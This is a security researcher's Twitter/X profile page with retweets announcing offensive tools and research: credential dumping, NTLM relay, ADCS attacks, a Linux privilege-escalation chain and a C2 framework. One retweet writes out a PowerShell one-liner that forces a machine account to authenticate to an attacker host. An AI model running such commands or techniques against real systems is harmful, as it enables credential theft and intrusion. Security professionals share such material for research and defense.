Zak

503 posts

@_ZakSec

Hacker with a colored hat - https://t.co/JHRtKm76td

Joined July 2016
628 Following, 1.6K Followers
Pinned Tweet
Zak@_ZakSec·
If you're interested in an alternative way to dump domain users' NT hashes and TGT without touching LSASS, take a look at the new Masky tool :) Everything is explained in this article: z4ksec.github.io/posts/masky-re… Thanks @harmj0y, @tifkin_ and @ly4k_ for their amazing work on ADCS!
Zak retweeted
V4bel
V4bel@v4bel·
💥 Introducing "Dirty Frag" A universal Linux LPE chaining two vulns in xfrm-ESP and RxRPC. A successor class to Dirty Pipe & Copy Fail. No race, no panic on failure, fully deterministic. ~9 years latent. Ubuntu / RHEL / Fedora / openSUSE / CentOS / AlmaLinux, and more. Even if you've applied the "Copy Fail" mitigation, your Linux is still vulnerable to "Dirty Frag". Apply the Dirty Frag mitigation. Details: dirtyfrag.io
Zak retweeted
SpecterOps
SpecterOps@SpecterOps·
Relayed NTLM creds are powerful, if you can use them. @senderend shows why browsers fail through ntlmrelayx SOCKS and introduces ghostsurf to make NTLM-authenticated web apps accessible. Read more ⤵️ ghst.ly/4tnJOtx
Zak retweeted
Alex Neff
Alex Neff@al3x_n3ff·
A new module just got merged into NetExec: get-scriptpath📜 This module queries all users for the scriptpath attribute. If you have privileges over one of these scripts (or they e.g. try to mount a network share) you can compromise this user on their next login. Made by @0xwyndo
Zak retweeted
watchTowr
watchTowr@watchtowrcyber·
Happy weekend! Enjoy our analysis of CVE-2026-3055 - yet another 'Memory Overread' vulnerability in Citrix NetScaler appliances. labs.watchtowr.com/the-sequels-ar…
Zak retweeted
Aurélien Chalot
Aurélien Chalot@Defte_·
In this blogpost I tried to sum up everything I know, walking you from the "I have an EDR, I'm secure" mindset to "let's build a resilient tiering model". Let me know what you think about it :)! sensepost.com/blog/2026/from…
Zak retweeted
7h3h4ckv157
7h3h4ckv157@7h3h4ckv157·
ADCSDevilCOM 📍 A C# tool for requesting certificates from ADCS using DCOM over SMB. This tool allows you to remotely request X.509 certificates from CA server using the MS-WCCE protocol over DCOM and it bypasses the traditional endpoint mapper requirement by using SMB directly. By: @AnonArtist8 github.com/7hePr0fess0r/A…
Zak retweeted
SpecterOps
SpecterOps@SpecterOps·
Credential Guard was supposed to end credential dumping. It didn't. @bytewreck just dropped a new blog post detailing techniques for extracting credentials on fully patched Windows 11 & Server 2025 with modern protections enabled. Read for more ⤵️ ghst.ly/4qtl2rm
Zak retweeted
hashcat
hashcat@hashcat·
hashcat v7.0.0 released! After nearly 3 years of development and over 900,000 lines of code changed, this is easily the largest release we have ever had. Detailed writeup is available here: hashcat.net/forum/thread-1…
Zak retweeted
SpecterOps
SpecterOps@SpecterOps·
Red teamers know the drill: endless file churning, hunting for passwords & tokens. 🔍 Meet DeepPass2, our new secret scanning tool that goes beyond structured tokens to catch those tricky free-form passwords too. Read Neeraj Gupta's blog post for more. ghst.ly/40HLNNA
Zak retweeted
Dirk-jan
Dirk-jan@_dirkjan·
It's been almost a year since my last blog... So, here is a new one: Extending AD CS attack surface to the cloud with Intune certificates. Also includes ESC1 over Intune (in some cases). dirkjanm.io/extending-ad-c… Oh, and a new tool for SCEP: github.com/dirkjanm/scepr…
Zak retweeted
S3cur3Th1sSh1t
S3cur3Th1sSh1t@ShitSecure·
This is so much! 🔥🔥😎 Found two new Potato triggers just today. Not only Potato but can also be used for LPE as remote auth is done which could be relayed to LDAP without Signing enabled. Or relayed to ADCS for a certificate. github.com/warpnet/MS-RPC…
Zak retweeted
5pider
5pider@C5pider·
Introducing Havoc Professional: A Lethal Presence We’re excited to share a first look at Havoc Professional, a next-generation, highly modular Command and Control framework, and Kaine-kit our fully Position Independent Code agent engineered for stealth! infinitycurve.org/blog/introduct…
Zak retweeted
SpecterOps
SpecterOps@SpecterOps·
Introducing the BloodHound Query Library! 📚 @martinsohndk & @joeydreijer explore the new collection of Cypher queries designed to help BloodHound users to unlock the full potential of the BloodHound platform by creating an open query ecosystem. ghst.ly/4jTgRQQ
Zak retweeted
Mayfly
Mayfly@M4yFly·
Did you know you didn't need to use a potatoes exploit to go from iis apppool account to admin or system? Simply use: powershell iwr http://192.168.56.1 -UseDefaultCredentials To get an HTTP coerce of the machine account. 👇🧵